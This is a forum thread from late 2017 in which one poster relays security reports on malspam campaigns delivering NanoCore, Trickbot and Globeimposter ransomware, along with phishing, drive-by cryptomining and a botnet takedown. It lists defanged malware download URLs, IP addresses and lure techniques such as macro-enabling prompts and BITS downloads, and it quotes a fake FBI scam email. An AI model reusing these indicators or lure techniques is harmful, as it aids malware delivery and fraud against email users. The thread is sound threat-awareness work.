2072 replies to this topic

[AplusWebMaster]

FYI...

Fake 'Product Enquiry' SPAM - delivers Nanocore RAT
- https://myonlinesecu...s-nanocore-rat/
17 Nov 2017 - "An email with the subject of 'Product Enquiry' pretending to come from Robert Osuna Sales <roberto. osuna76@mail .com> with a malicious Excel XLS spreadsheet attachment delivers NanoCore Remote Access Trojan...

Screenshot: https://myonlinesecu...uct_enquiry.png

These are actually coming via an automated mailing service based in Russia, who despite sending malware are complying with the various anti-spam laws worldwide by having an unsubscribe link in the email body. I do not recommend to use the -unsubscribe- link. That is an almost guaranteed way to get your email address added to a load more spam and malware lists. The blurry image in the XLS spreadsheet is a Social Engineering trick to persuade you to enable editing & content (macros) so they can infect you.
DO NOT enable Editing or Content (macros) under any circumstances:
> https://myonlinesecu...enquiry_xls.png

Product Enquiry.xls - Current Virus total detections 14/61*. Hybrid Analysis**...
This malware downloads from
 http ://cryptovoip .in/awedfs/DDF_outputCEAA78F.exe (VirusTotal 18/68[3]) (Hybrid Analysis[4])...
Email Headers and malware sites details:
191.96.249.92 - smtp4.digitalsearchengine .in - Moscow...
balajipacker .com  registered 27/09/2017 using Godaddy as registrar hosted on 191.96.249.92
cryptovoip .in 103.21.58.122 Probably a hacked compromised server not knowingly involved in hosting the malware payload...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1510851227/

** https://www.hybrid-a...vironmentId=100
DNS Requests
181.215.247.234
103.21.58.122
Contacted Hosts
103.21.58.122
201.174.233.241
181.215.247.234

3] https://www.virustot...sis/1510899976/
DDF_outputCEAA78F[1].exe

4] https://www.hybrid-a...vironmentId=100
DNS Requests
181.215.247.234
Contacted Hosts
201.174.233.241
181.215.247.234

digitalsearchengine .in: A temporary error occurred during the lookup...

cryptovoip .in: 103.21.58.122: https://www.virustot...22/information/
> https://www.virustot...d702a/analysis/
 

   

[AplusWebMaster]

FYI...

Fake 'scanned from' SPAM - delivers Ransomware
- https://myonlinesecu...opier-messages/
23 Nov 2017 - "... It is almost as if they have timed the new version to spam out on Thanksgiving day in USA, where the AV companies and security teams are off on their long weekend holiday... downloaders from the Necurs botnet... an email with the subject of 'scanned from (printer or scanner name)' pretending to come from copier@ your own email address or company domain... definitely ransomware but doesn’t look like Locky. The ransom note is very different. These all have -blank- email bodies with just an attachment and the subject...
Update I am being told it is Scarab Ransomware... The new ransom note is called 'IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT'... The subjects in this vary but are all copier or scanner related:
    Scanned from Lexmark
    Scanned from HP
    Scanned from Canon
    Scanned from Epson

P_rek.zip: Extracts to: image2017-11-22-5864621.vbs - Current Virus total detections 4/57*. Hybrid Analysis**
| Anyrun Beta[3] | Joesecurity[/4] |
This downloads from (in this example, there will be -dozens- of other download sites)
 http ://pamplonarecados .com/JHgd476? (VirusTotal 8/66[5])
One of the  emails looks like:
From: copier@ victimsdomain .com
Date: Thu 23/11/2017 06:28
Subject: Scanned from HP
Attachment: image2017-11-23-4360760.7z
Body content:

    EMPTY

The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1511423196/
image2017-11-22-5864621.vbs

** https://www.hybrid-a...vironmentId=100
DNS Requests
5.2.88.79
88.99.66.31
Contacted Hosts
5.2.88.79
88.99.66.31

3] https://app.any.run/...c6-8aead1ea33a8

4] https://jbxcloud.joe...s/445266/1/html

5] https://www.virustot...sis/1511422910/
JHgd476

pamplonarecados .com: 5.2.88.79: https://www.virustot...79/information/
> https://www.virustot...f655f/analysis/
 

   

[AplusWebMaster]

FYI...

Fake 'Invoice' SPAM - delivers ransomware
- https://myonlinesecu...-fake-invoices/
30 Nov 2017 - "... from the Necurs botnet... an email with an -empty- body with the subject of 'FL-610025 11.30.2017' (random numbers) pretending to come from 'Invoicing' @ random email addresses. Today it is Globeimposter -not- Locky ransomware being delivered via this malspam campaign from the Necurs botnet...
One of the  emails looks like:
From: Invoicing <Invoicing@random company >
Date: Thu 30/11/2017 09:18
Subject: FL-610025 11.30.2017
Attachment: FL-610025 11.30.2017.7z

Body content: Completely empty

FL-610025 11.30.2017.7z: Extracts to: FL-432927.vbs - Current Virus total detections 9/60*. Hybrid Analysis**...
Downloads from
 http ://datenhaus .info/JHGcd476334? (as usual there will be dozens of different download sites - (VirusTotal 10/66[3])... Other download sites that I have been notified about:
mh-service .ru/JHGcd476334?
awholeblueworld .com/JHGcd476334?
... The ransom payment link is to
 http ://n224ezvhg4sgyamb .onion/sup .php where you see a pretty bland page giving this link to make enquiries... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1512033616/
FL-432927.vbs

** https://www.hybrid-a...vironmentId=100
DNS Requests
85.214.205.231
Contacted Hosts
85.214.205.231

3] https://www.virustot...sis/1512033503/
d4ddf8bf.exe

datenhaus .info: 85.214.205.231: https://www.virustot...31/information/
> https://www.virustot...3abcf/analysis/

mh-service .ru: 89.253.235.118: https://www.virustot...18/information/
> https://www.virustot...9725b/analysis/

awholeblueworld .com: 66.36.173.215: https://www.virustot...15/information/
> https://www.virustot...f30eb/analysis/
___

Persistent drive-by cryptomining...
- https://blog.malware...owser-near-you/
Nov 29, 2017 - "... we are witnessing more and more cases of abuse involving the infamous 'Coinhive' service that allows websites to use their visitors to mine the Monero cryptocurrency. Servers continue to get hacked with mining code, and plugins get hijacked and affect hundreds or even thousands of sites at once... we have come across a technique that allows dubious website owners or attackers that have compromised sites to keep mining for Monero even after the browser window is closed. Our tests were conducted using the latest version of the Google Chrome browser. Results may vary with other browsers. What we observed was the following:
  A user visits a website, which silently loads cryptomining code.
  CPU activity rises but is not maxed out.
  The user leaves the site and closes the Chrome window.
  CPU activity remains higher than normal as cryptomining continues:
> https://blog.malware...dden_mining.gif
The trick is that although the visible browser windows are closed, there is a hidden one that remains opened. This is due to a 'pop-under' which is sized to fit right under the taskbar and hides behind the clock. The hidden window’s coordinates will vary based on each user’s screen resolution... If your Windows theme allows for taskbar transparency, you can catch a glimpse of the rogue window. Otherwise, to expose it you can simply resize the taskbar and it will magically pop it back up:
> https://blog.malware.../os_compare.png
... Mitigation: This type of 'pop-under' is designed to bypass adblockers and is a lot harder to identify because of how cleverly it hides itself. Closing the browser using the “X” is no longer sufficient. The more technical users will want to run Task Manager* to ensure there is no remnant running browser processes and terminate them.
* https://www.howtogee...s-task-manager/
Alternatively, the taskbar will still show the browser’s icon with slight highlighting, indicating that it is still running:
> https://blog.malware..._mitigation.png

> https://blog.malware..._mitigation.png
... Nearly two months since Coinhive’s inception, browser-based cryptomining remains highly popular, but for all the wrong reasons. Forced mining (no opt-in) is a bad practice, and any tricks like the one detailed in this blog are only going to erode any confidence some might have had in mining as an ad replacement. History shows us that trying to get rid of ads failed before, but only time will tell if this will be any different.
Unscrupulous website owners and miscreants alike will no doubt continue to seek ways to deliver drive-by mining, and users will try to fight back by downloading more adblockers, extensions, and other tools to protect themselves. If malvertising wasn’t bad enough as is, now it has a new weapon that works on all platforms and browsers."
Indicators of compromise:
145.239.64.86,yourporn[.]sexy,Adult site
54.239.168.149,elthamely[.]com,Ad Maven popunder
52.85.182.32,d3iz6lralvg77g[.]cloudfront.net,Advertiser's launchpad
54.209.216.237,hatevery[.]info,Cryptomining site

- https://centralops.n...ainDossier.aspx
hatevery .info
52.72.157.243
54.156.6.169
52.200.89.230
52.54.161.204
54.84.183.12
34.237.128.64 ...
'Fast Flux' network: https://www.welivese...-networks-work/

- https://www.helpnets...g-close-window/
Nov 30, 2017
 

   

Edited by AplusWebMaster, 01 December 2017 - 06:33 AM.

[AplusWebMaster]

FYI...

Fake 'Visa notification' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
1 Dec 2017 - "An email with the subject of Fwd:... (recipient’s name) pretending to come from Pamela <logo@ mensperl .edu> (probably random senders) with a malicious word doc attachment...
Update: I am reliably informed that it is Sigma ransomware[1] which appears to only run on a real computer, not a VM or Sandbox...
1] https://twitter.com/...534360148402176

Screenshot: https://myonlinesecu...sa_scan_doc.png

derek_scan.doc - Current Virus total detections 0/60*... Hybrid Analysis** (I forgot to try to insert password in the settings)
Word doc with password removed (VirusTotal 23/61***) (Hybrid Analysis[4]). This malware downloads from
 http ://ypg7rfjvfywj7jhp .onion.link/icon.jpg -renamed- to svchost.exe by-the-macro on download
(VirusTotal 24/67[5]) (Hybrid Analysis[6])...
Word doc when first opened looks like this and you need to insert the password from the email body:
> https://myonlinesecu...c_pw_needed.png
Word doc after inserting password, telling you to enable editing & content:
> https://myonlinesecu..._doc_enable.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... Do NOT enable Macros or editing under any circumstances... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1512109411/

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...sis/1512110582/

4] https://www.hybrid-a...vironmentId=100
DNS Requests
94.130.28.200
185.194.141.58
Contacted Hosts
185.194.141.58
94.130.28.200
163.172.176.167
199.254.238.52
5.39.92.199
159.203.15.100
87.118.112.63
165.227.135.224
93.115.95.38

5] https://www.virustot...aa24c/analysis/
icon.jpg

6] https://www.hybrid-a...vironmentId=100
DNS Requests
94.130.28.200
185.194.141.58
Contacted Hosts
185.194.141.58
94.130.28.200
163.172.176.167
199.254.238.52
5.39.92.199
159.203.15.100
87.118.112.63
165.227.135.224
93.115.95.38
___

Fake 'invoice' SPAM - delivers Globeimposter ransomware
- https://myonlinesecu...en-attachments/
1 Dec 2017 - "... from the Necurs botnet... an email with the subject of '12_Invoice_6856' (random numbers)  coming from random email addresses... The bland email has what pretends to be a word doc attachment. It is NOT a word doc but a wrongly named .7z (zip) file. If you rename the 001_0343.doc to 001_0343.doc.7z it can be easily extracted to give a working vbs file...

Screenshot: https://myonlinesecu..._6856_email.png

001_0343.doc.7z: Extracts to: I912798654581.vbs - Current Virus total detections 9/60*. Hybrid Analysis**...

This particular example downloads from (there will be several others)
 http ://pdj .co .id/UYTd46732? (VirusTotal 7/68[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1512125181/
I912798654581.vbs

** https://www.hybrid-a...vironmentId=100
DNS Requests
202.169.44.166
Contacted Hosts
202.169.44.166
88.99.66.31

3] https://www.virustot...sis/1512125396/
UYTd46732.exe

pdj .co .id: 202.169.44.166: https://www.virustot...66/information/
> https://www.virustot...44742/analysis/
 

   

Edited by AplusWebMaster, 01 December 2017 - 07:41 AM.

[AplusWebMaster]

FYI...

'Avalanche' takedown - with 'Andromeda'
- http://blog.shadowse...with-andromeda/
Dec 4, 2017 - "On December 1st last year, the successful takedown* of the long-running criminal Avalanche double fast-flux-platform was announced by a consortium of international public and private partners, including The Shadowserver Foundation. This unprecedentedly complex operation was the culmination of over four-years of law enforcement and technical work, and impacted over twenty different malware families that utilized over 832,000 different DNS domains for Domain Generation Algorithms (DGAs) in -60- top level domains. Sinkhole data from the Avalanche platform is available each day in Shadowserver’s free of charge daily reports to national CERTs and network owners... with many victim computers still to be disinfected (you can find tools for disinfection here[1])...
* http://blog.shadowse...2/01/avalanche/
...
1] https://avalanche.shadowserver.org/
... On 29 November 2017, the Federal Bureau of Investigation (FBI), in close cooperation with the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol’s European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust and private-sector partners The Shadowserver Foundation, Microsoft, The Registrar of Last Resort, Internet Corporation for Assigned Names and Numbers (ICANN) and associated domain registries, Fraunhofer Institute for Communication, Information Processing and Ergonomics (FKIE), and the German Federal Office for Information Security (BSI), as well as law enforcement representatives from Australia, Austria, Belarus, Belgium, Canada, Finland, France, Italy, the Montenegro, Netherlands, Poland, Singapore, Spain, the United Kingdom and Taiwan, announced** that they had dismantled one of the longest running malware families in existence – Andromeda (also known as Gamarue). At the same time, they also continued their existing legal and technical actions against over 848,000 Avalanche related command and control (C2) domains, to continue to protect existing victims and provide more time for any remaining victims to be identified and remediated...
** https://www.europol....cyber-operation
... They successfully extended and expanded sinkholing of the -21- malware families that made use of the Avalanche platform, and the associated takedown of the -Andromeda-botnet- is another great example of how complex international operations can successfully be jointly executed by a combination of cross-disciplinary public and private partners in the ongoing fight against cyber criminals globally."
(More detail at the URL at the top.)

> https://avalanche.sh...rver.org/stats/

> http://blog.shadowse...dromeda-map.png

> https://www.justice....known-avalanche
Dec 1, 2017 - "... The operation involves arrests and searches in five countries. More than -50- Avalanche servers worldwide were taken offline..."
Press Release Number: 16-1409
___

PayPal phish - 'verify transactions'
- https://blog.malware...ons-dont-do-it/
Dec 1, 2017 - "There’s a number of -fake- PayPal emails going around right now claiming that a 'recent transaction can’t be verified'... Here’s two examples of how these mails are being named from one of our mailboxes:
> https://blog.malware...phish-mails.jpg
Here’s the most recent email in question:
> https://blog.malware...-phish-mail.jpg
Clicking the button takes potential victims to a -fake- PayPal landing page, which tries very hard to direct them to a “resolution center”:
> https://blog.malware...anding-page.jpg
The URL is:
myaccounts-webapps-verify-updated-informations(dot)epauypal(dot)com/myaccount/e6abe

epauypal(dot)com: A temporary error occurred during the lookup...

From here, it’s a quick jump to two pages that ask for the following slices of personal information and payment data:
1. Name, street address, city, state, zip, country, phone number, mother’s maiden name, and date of birth
2. Credit card information (name, number, expiration code, security code)
> https://blog.malware...nfo-request.jpg
... Whatever your particular spending circumstance, wean yourself away from clicking on -any- email-link where claims of payment or requests for personal information are concerned. Take a few seconds to manually navigate to the website in question. and log in directly instead. If there are any payment hiccups happening behind the scenes, you can sort things out from there. Scammers are banking on the holiday rush combined with the convenience of “click link, do thing” to steal cash out from under your nose..."

- https://www.helpnets...liday-phishing/
Dec 4, 2017
___

> https://www.databrea...d-major-breach/
Dec 4, 2017

> https://www.theregis...io_data_breach/
Dec 4, 2017

> http://www.tio.com/
Dec 1, 2017
 

   

Edited by AplusWebMaster, 04 December 2017 - 02:56 PM.

[AplusWebMaster]

FYI...

Fake 'Message' SPAM - delivers Globeimposter ransomware
- https://myonlinesecu...inter-messages/
5 Dec 2017 - "... downloaders from the Necurs botnet... an email with the subject of 'Message from G10PR0378651 .victimsdomain .com' pretending to come from random names at your own email address or company domain... The attachment says it is a zip file but is actually a 7z file renamed to zip...

Screenshot: https://myonlinesecu...10PR0378651.png

201712054051.zip: Extracts to: MSC000000981631.vbs - Current Virus total detections 2/59*. Hybrid Analysis**...
This particular version downloads from
 http ://rorymartin8 .info/hudgy356? (there will be dozens of others) (VirusTotal 4/56[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1512468367/
MSC000000981631.vbs

** https://www.hybrid-a...vironmentId=100
DNS Requests
192.185.193.214
Contacted Hosts
192.185.193.214

3] https://www.virustot...sis/1512468259/

rorymartin8 .info: 192.185.193.214: https://www.virustot...14/information/
> https://www.virustot...76399/analysis/
 

   

Edited by AplusWebMaster, 05 December 2017 - 06:50 AM.

[AplusWebMaster]

FYI...

Fake 'documents' SPAM - delivers Trickbot
- https://myonlinesecu...uments-malspam/
6 Dec 2017 - "... an email containing the subject of 'Confidential account documents' pretending to come from Lloyds Bank but actually coming from a look-a-like or typo-squatted domain <secure@ lloyds-commercial .com >  with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...al_trickbot.png

Protected32.doc - Current Virus total detections 3/59*. Hybrid Analysis**...
This malware docx file downloads from
 http ://undergroundis .com/images/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to Wkob.exe (VirusTotal 13/67***)... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustot...sis/1512558154/
Protected32.doc

** https://www.hybrid-a...vironmentId=100
DNS Requests
216.239.36.21
192.254.225.208
Contacted Hosts
192.254.225.208
216.239.36.21
185.158.114.106
92.53.66.115

*** https://www.virustot...sis/1512558724/

undergroundis .com: 192.254.225.208: https://www.virustot...08/information/
> https://www.virustot...8f625/analysis/
___

Google update 'glitch' disconnects student Chromebooks in schools across the U.S.
- https://www.geekwire...ols-across-u-s/
Dec 5, 2017 at 4:59 pm - "... Tens of thousands, perhaps millions, of Google Chromebooks, widely prized by schools due to their low cost and ease of configuration, were reported to be offline for several hours on Tuesday. The apparent cause? A seemingly -botched- WiFi policy update pushed out by Google that caused many Chromebooks to forget their approved network connection, leaving students disconnected.
Google first gave schools a heads-up via Twitter after the fact, indicating there was a fix.
   'We're aware of a wifi connectivity outage that affected some Chromebooks today. The issue is resolved. To get your Chromebooks online: reboot & manually join a WiFi network or connect via ethernet to receive a policy update. Sorry for the disruption & thank you for your patience.
    — Google For Education (@GoogleForEdu) December 5, 2017'
- https://twitter.com/...f_src=twsrc^tfw
That disclosure led to dismayed reaction by educators, some of whom had Chromebook installations in the thousands... GeekWire reached out to Google for more information about the cause and scope of the Chromebook issue, and will update this post if more details become available."
 
> https://cdn.geekwire...oogle120517.png

Current Status: http://downdetector.com/status/google
'Google problems last 24 hours'

>> https://support.goog.../answer/7583402
Article last updated on Dec 6, 2017
 

   

Edited by AplusWebMaster, 06 December 2017 - 02:37 PM.

[AplusWebMaster]

FYI...

Fake 'account documents' SPAM - delivers Trickbot
- https://myonlinesecu...e-form-malspam/
7 Dec 2017 - "... an email containing the subject of 'Your account documents' pretending to come from Companies House but actually coming from a look-a-like or typo-squatted domain <no-reply@ companieshouseform .co.uk> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...secure-form.png

SecureForm84.doc - Current Virus total detections 3/60*| Hybrid Analysis**... This malware docx file downloads  from
 http ://aperhu .com/ser0712.png which of course is -not- an image file but a renamed .exe file that gets renamed to Ejjmdejh9.exe (VirusTotal 8/68[3])...
The alternative download location is
 http ://altarek .com/ser0712.png...
... Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services...
  companieshouseform .co.uk hosted on numerous servers and IP addresses and sending the emails via  185.207.204.218 | 185.23.215.76 | 89.39.106.208 | All of which are based in Netherlands...
Malware detail:
> https://myonlinesecu...rm_word_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustot...sis/1512651253/
SecureForm6.doc

** https://www.hybrid-a...vironmentId=100
DNS Requests
146.255.36.1
143.95.252.46
Contacted Hosts
143.95.252.46
146.255.36.1
185.80.128.223
82.146.47.221
185.125.46.161

3] https://www.virustot...sis/1512647520/
fbwnk.exe

aperhu .com: 143.95.252.46: https://www.virustot...46/information/
> https://www.virustot...001d0/analysis/

altarek .com: 64.50.184.217: https://www.virustot...17/information/
> https://www.virustot...e50bb/analysis/
 

   

Edited by AplusWebMaster, 07 December 2017 - 08:37 AM.

[AplusWebMaster]

FYI...

Fake 'Amazon invoice' SPAM - delivers Trickbot
- https://myonlinesecu...-necurs-botnet/
12 Dec 2017 - "... Necurs botnet has changed again today...
Update: I am informed that this is definitely Trickbot banking trojan, not ransomware, although several antiviruses are detecting it as a ransomware version. An email with the subject of 'Invoice RE-2017-12-12-00572' (random numbers after the date) pretending to come from Amazon Marketplace <lqftdwbmxYYfT@ marketplace.amazon .com> (random characters before the @) with a malicious word doc attachment...

Screenshot: https://myonlinesecu...marketplace.png

RE-2017-12-12-00572.doc - Current Virus total detections 12/59*. Hybrid Analysis**...
This malware downloads from
 http ://ragazzemessenger .com/nyRhdkwSD which gave ejmaryj8.exe (VirusTotal 9/67[3]) (Hybrid Analysi[4])...
There will be loads of other download sites... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustot...sis/1513080354/
RE-2017-12-12-00775.doc

** https://www.hybrid-a...vironmentId=100
DNS Requests
158.69.26.138
98.124.251.168
Contacted Hosts
98.124.251.168
158.69.26.138
67.209.219.92
179.43.147.243
95.213.237.241

3] https://www.virustot...sis/1513080273/

4] https://www.hybrid-a...vironmentId=100

ragazzemessenger .com: 98.124.251.168: https://www.virustot...68/information/
> https://www.virustot...c4c38/analysis/
 

   

[AplusWebMaster]

FYI...

Fake 'Scan' SPAM - delivers Globeimposter ransomware
- https://myonlinesecu...ware-but-fails/
15 Dec 2017 - "... Necurs botnet has messed up again today... an email with the subject of 'Scan' pretending to come from random names and email addresses... It is trivially easy to decode the base64 section, create the 7z file & extract the vbs to get the Globeimposter ransomware they are attempting to deliver. Over the last few weeks we have seen this behaviour several times. Sometimes with 7z or zip files. Sometimes with word docs...

Screenshot: https://myonlinesecu...15_08-02-13.png

Scan_00057.7z: - Extracts to: Scan_005287.vbs - Current Virus total detections 7/60*. Hybrid Analysis**...
This particular version downloads from
  http ://peopleiknow .org/JKHhgdf72? - there will be several other locations in -other- vbs files...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1513324220/
Scan_005287.vbs

** https://www.hybrid-a...vironmentId=100

peopleiknow .org: 67.210.102.240: https://www.virustot...40/information/
> https://www.virustot...43e61/analysis/
___

Fake FBI phish - leads to Tech Support Scam
- https://myonlinesecu...h-support-scam/
14 Dec 2017 - "... It pretends to be a message from the FBI saying you might be a victim of cyber crime and you should ring the phone number in the email. The phone number belongs to a dubious Tech Support service:
globalphonesupport .com: 69.89.31.186: https://www.virustot...86/information/

If you are unwise enough to ring the number you will be falsely told that there is something wrong with your computer. 'It needs cleaning'... and it will cost you at least one hundred USD to repair.
It is highly likely that these scammers will ask you to install a 'remote access program' (although they call it something else)...
Unusually there is no link in this email. [Some] of these scams will have a link that leads to page saying your computer is infected with Zeus trojan or similar that locks-the-browser and displays the phone number to ring...

Screenshot: https://myonlinesecu...upport-Scam.png

" ... RE: Case: 8755174734
The IP address registered on your name was referred to our ICC Center multiple times as being a possible victim of cyber crime.
We believe that your IP address and other identifying information were used to commit several computer fraud and abuse crimes. This investigation covers the time period from August 7, 2017 to the present date.
We appreciate your instant assistance to this matter. Please contact us urgently with all of the information concerning this case, at telephone number listed below... "

These emails use Social engineering tricks to persuade you to open the attachments, follow links or ring the phone number in the email...
___

AIM - discontinued on Dec 15, 2017
- https://help.aol.com...im-discontinued
"As of December 15, 2017, AOL Instant Messenger products and services will be shut down and will no longer work.
If you are an AOL member, AOL products and services​ ​like AO​​L Mail, AOL Desktop Gold an​d Member​ Subscriptions will not be affected.​ To view your benefits, please visit: https://mybenefits.aol.com/ "
 

   

Edited by AplusWebMaster, 15 December 2017 - 10:07 AM.

[AplusWebMaster]

FYI...

Fake 'Website Job Application' SPAM - delivers malware
- https://myonlinesecu...ferent-malware/
20 Dec 2017 - "... This is a continuation from these 3 previous posts about malware using resumes or job applications as the lure [1] [2] [3]... The primary change in delivery method is the use of a password for the word doc to try to bypass antivirus filters... Today’s version continues to SmokeLoader/Sharik trojan which is a downloader for -other- malware. An email with the subject of 'Website Job Application' coming from Rob Meyers <Gong@ latestmistake .com> (probably random names) with a malicious word doc attachment delivers SmokeLoader/ sharik trojan...
1] https://myonlinesecu...obe-ransomware/
2] https://myonlinesecu...ads-to-malware/
3] https://myonlinesecu...eliver-malware/

Screenshot: https://myonlinesecu...esume_eml-1.png

Rob Resume.doc - Current Virus total detections 11/59*. Hybrid Analysis**... It should be noted that this malicious word doc and the downloaded malware either has some sort of anti-analysis protection or the malware delivery site will reject connections from known sandboxes, VM analysis tools and known researcher or antivirus IP addresses. Neither of the 2 Online sandboxes / analysis tools could retrieve the downloaded malware. That had to be done manually. They have continued with the previous behaviour of using BITS (bitsadmin.exe) to download the file instead of PowerShell. They also are still using “autoclose” in the macro so it doesn’t run until the word doc has been closed, so avoiding any obvious signs of infiltration. Also the downloaded file sleeps for a long, long time before doing anything. This malware downloads from
 http ://80.82.67.217/paddle.jpg which of course it -not- an image file but a renamed .exe (ASxas.exe)
VirusTotal 8/67[4]. Hybrid Analysis[5]... HA shows a further download of a bitcoin miner (VirusTotal 43/66[6])
but Anyrun could not get anything despite leaving it running for 10 minutes...
This word doc looks like this:
> https://myonlinesecu...esume_1_doc.png
And after you input the password from the email body (123456) you see a typical page asking you to enable editing and then macros and content:
> https://myonlinesecu...esume_2_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1513715092/
Resume.doc

** https://www.hybrid-a...vironmentId=100

4] https://www.virustot...sis/1513716371/
paddle.jpg.exe

5] https://www.hybrid-a...vironmentId=100
DNS Requests
37.59.55.60
107.181.246.221
Contacted Hosts
139.59.208.246
107.181.246.221
188.165.214.95

6] https://www.virustot...6d51c/analysis/
bitcoinminer1

80.82.67.217: https://www.virustot...17/information/
> https://www.virustot...4cbe9/analysis/
___

Office as a malware delivery platform: DDE, Scriptlets, Macro obfuscation
... Powerful behind-the-scenes features in Office have suddenly stepped back into the malware limelight, with an onslaught of mostly macro-less attacks starring jimmied Word, Excel and PowerPoint documents
> https://www.computer...bfuscation.html
Dec 19, 2017 - "... Some clever researchers have found new and unexpected ways to get Word, Excel and PowerPoint documents to deliver all sorts of malware — ransomware, snoopers, even a newly discovered credential stealer that specializes in gathering usernames and passwords. In many cases, these new uses employ methods as old as the hills. But the old warning signs don’t work as well as they once did..."
(Much more detail at the computerworld URL above.)

ADV170021 | Microsoft Office Defense in Depth Update
- https://portal.msrc....isory/ADV170021
12/12/2017 - "... provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word..." - Also:
> https://docs.microso...es/2017/4053440
Updated: Dec 12, 2017

>> https://www.askwoody...on/#post-153388
Dec 20, 2017
 

   

Edited by AplusWebMaster, 20 December 2017 - 08:22 AM.

[AplusWebMaster]

FYI...

DoubleClick Advertising network XSS vuln
- https://myonlinesecu...-vulnerability/
21 Dec 2017 - "Just a quick alert about an email from Google warning of vulnerabilities in some DoubleClick publishers. This has been sent to all website owners who use DoubleClick in any form. However this will ONLY affect website owners who use DoubleClick as a stand alone service to display adverts. It does not affect website owners who use Google AdSense to display adverts and have enabled the additional options to also use DoubleClick as a method of advertising in the allowed advertisers section of your Google AdSense settings page:
> https://myonlinesecu...k_XSS_alert.png
The email reads:
'Dear Customer,
We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster. These are the currently identified third-party vendor files...'"
(More detail at the myonlinesecurity URL above.)

> https://support.goog.../answer/7622991
___

Cryptominers...
- https://umbrella.cis...-mining-mayhem/
Dec 19, 2017 - "As cryptocurrencies continue to increase in value, cryptomining becomes increasingly more lucrative. With Bitcoin nearly reaching $18,000USD/1BTC, speculation that other cryptocurrencies such as Etherium and Monero may hit this mark eventually is rising. Monero is especially interesting given that one of its primary advantages is the relatively low processing power needed to mine it. Given that it is capable of being mined even by consumer grade computers, many organizations have tried to capitalize on this facet of the currency.
> https://s3-us-west-1...seOfTheCoin.png
Launched in September of this year, Coinhive is a service that has transformed the internet already in its short life. 'Coinhive' allows users to embed JavaScript API calls to enable anonymous mining of Monero cryptocurrency in browsers. 'Monero' aims to improve on existing cryptocurrency design by obscuring the sender, recipient and amount of every transaction made, as well as making the mining process more egalitarian by lowering processing costs. Though Coinhive as an organization has said they want users to come up with new uses for their service, it’s hard to imagine they wanted users to create apps that then go on to be abused...
It’s impossible to say with accuracy where the future will take cryptocurrencies or cryptominers, but they’re almost certainly here to stay. As the internet continues to evolve in its third decade of existence, enterprising individuals will always be looking for the next motherlode, taking advantage of a landscape that others can’t see."
(More detail at the umbrella.cisco URL above.)
 

Edited by AplusWebMaster, 21 December 2017 - 09:50 AM.

[AplusWebMaster]

FYI...

Fake 'Outstanding Statement' SPAM - delivers ransomware
- https://myonlinesecu...ter-ransomware/
22 Dec 2017 - "... malware downloaders from the Necurs botnet... an email with the subject of 'Outstanding Statement' pretending to come from Prime Express Oldham <sales62@ primeexpressuk .com> (random numbers after sales) delivering Globeimposter ransomware...

Screenshot: https://myonlinesecu...22_11-48-59.png

Customer Statement (122017_6816162).7z: Extracts to: Customer Statement (122017_51767638).js
Current Virus total detections 16/55*. Hybrid Analysis**...
This js file downloads from
 http ://www.upperlensmagazine .com/tOldHSYW??DVTCGAtym=DVTCGAtym (VirusTotal 11/68[3]). As usual there will be 6 or 8 other download sites... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1480616575/
-6dt874p53077.js

** https://www.hybrid-a...vironmentId=100
DNS Requests
45.126.209.154
Contacted Hosts
45.126.209.154

3] https://www.virustot...sis/1513941343/
GWMadFzby2.exe

upperlensmagazine .com: 45.126.209.154: https://www.virustot...54/information/
> https://www.virustot...3ae1b/analysis/
 

   

Edited by AplusWebMaster, 22 December 2017 - 06:35 AM.

[AplusWebMaster]

FYI... Bah Humbug! ...

Fake 'UPS Invoice' SPAM - delivers Java Adwind
- https://myonlinesecu...va-jrat-trojan/
24 Dec 2017

Screenshot: https://myonlinesecu...UPS_Invoice.png

INVOICE.zip: extracts to INVOICEE.jar (533kb) - Current Virus total detections 14/61* | Hybrid Analysis**...

"... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

* https://www.virustot...sis/1514092872/
INVOICEE.jar

** https://www.hybrid-a...vironmentId=100
DNS Requests
185.171.25.4
Contacted Hosts
46.246.120.179
92.122.154.56
 

   

[AplusWebMaster]

FYI...

Fake blank/empty SPAM - delivers globeimposter ransomware
- https://myonlinesecu...ter-ransomware/
26 Dec 2017 - "... malware downloaders from the Necurs botnet... a blank/empty email with the subject of 'CCE26122017_004385' (random numbers after the date) pretending to come from random names and random email addresses that just has a 7z attachment containing a .js file... One of the  emails looks like:
From: Emmitt <Emmitt@ kendrixcorp .com>
Date: Tue 26/12/2017 15:04
Subject: CCE26122017_004385
Attachment: CCE26122017_004385.7z
Body content: completely blank/empty

